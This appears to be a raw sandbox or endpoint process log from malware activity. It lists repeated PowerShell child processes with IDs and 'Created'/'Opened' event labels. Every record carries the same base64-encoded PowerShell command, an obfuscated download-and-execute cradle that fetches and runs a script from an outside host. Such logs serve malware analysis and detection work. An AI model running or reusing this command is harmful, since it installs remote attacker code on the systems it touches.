"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
21
1600
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
22
1276
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
23
944
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
24
2736
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
25
2804
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
26
2816
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
27
1460
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
28
516
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
29
1676
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
30
2280
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
31
2456
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
32
2540
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
33
804
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
34
1332
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
35
688
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
36
2492
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
37
1304
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
38
3104
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
39
3168
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
